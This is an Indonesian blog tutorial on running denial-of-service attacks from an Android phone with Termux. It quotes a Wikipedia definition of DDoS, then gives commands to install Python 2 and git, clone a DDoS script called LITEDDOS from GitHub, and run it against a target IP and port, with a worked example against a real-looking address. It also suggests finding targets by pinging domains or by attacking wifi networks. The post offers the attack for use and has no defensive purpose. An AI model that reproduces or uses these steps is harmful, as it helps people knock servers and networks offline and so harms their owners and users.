Skip to content Skip to sidebar Skip to footer

Cara DDoS di Termux dengan Android Terbaru

cara ddos menggunakan termux

Cara DDoS Di Termux Terbaru - Selamat datang kembali sobat bazengers di blog FHXploit !

di postingan kali ini saya akan memberikan tutorial cara melakukan serangan ddos lewat termux, sebelum kita masuk ke tutorial penggunaannya apa kalian tau apa itu ddos attack atau biasa di sebut serang ddos?

DDoS (bahasa Inggris: denial-of-service attacks') adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut. - Wikipedia

jadi pada dasarnya serangan ddos di lakukan untuk menyerang komputer atau server dengan tujuan agar komputer tersebut down/lumpuh sehingga tidak bisa di akses atau memberikan layanan seperti semestinya.

DDoS attack umumnya di lakukan menggunakan komputer tapi sekarang keta juga bisa melakukan serangan ddos lewat android meskipun belum keadaan root

sebelumnya saya sudah pernah share tutorial ddos di termux menggunakan hammer tapi sepertinya kurang efektiv jadi saya buatkan lagi yang terupdate.

sekarang kita akan menggunakan lite ddos untuk melakukan serangan ddos attack di termux, dengan lite ddos kita tinggal mengetikan ip adress atau ip android yang ingin kita ddos.

baiklah langsung saja kita masuk ke tahap penginstalan dan penggunaannya.

Cara Menggunakan Lite DDos Di Termux


1. pertama seperti biasa update repo!

$apt update && apt upgrade

2. install python versi ke 2 untuk menjalankan script Lite DDoSnya

$pkg install python2

3. jangan lupa juga install git untuk cloning script ddos dari github

$pkg install git

4. kemudian cloning script dari github melalui link berikut

$git clone https://github.com/4L13199/LITEDDOS

untuk melakukan serangan ddos menggunakan Lite DDoS, ketikan perintah berikut.

masuk ke direktori Litte DDOS

$cd LITEDDOS

selanjutnya jalankan dengan sintaks

$python2 LITEDDOS.py [ip target] [port] [jumlah ping]

contoh :

$ python2 LITEDDOS.py 172.217.194.100 80 500

oh iya untuk mengetahui ip adress target yang berbentuk domain kalian bisa lakukan ping terlebih dahulu dan jika kalian ingin melakukan serangan ddos attack ke wifi kalian bisa  mengecek ip wifi menggunakan perintah "ifconfig" di termux

dan pertanyaan yang sering kali di pertanyakan, apakah android bisa di ddos? tentu saja bisa, tapi perangkat attacker harus lebih banyak jadi jika ddos android hanya dengan satu perangkat saya rasa tidak akan ada efek apa - apa.

demikian tutorial Cara DDoS di Termux dengan android semoga bermanfaat dan sampai jumpa di postingan berikutnya.

Post a Comment for "Cara DDoS di Termux dengan Android Terbaru"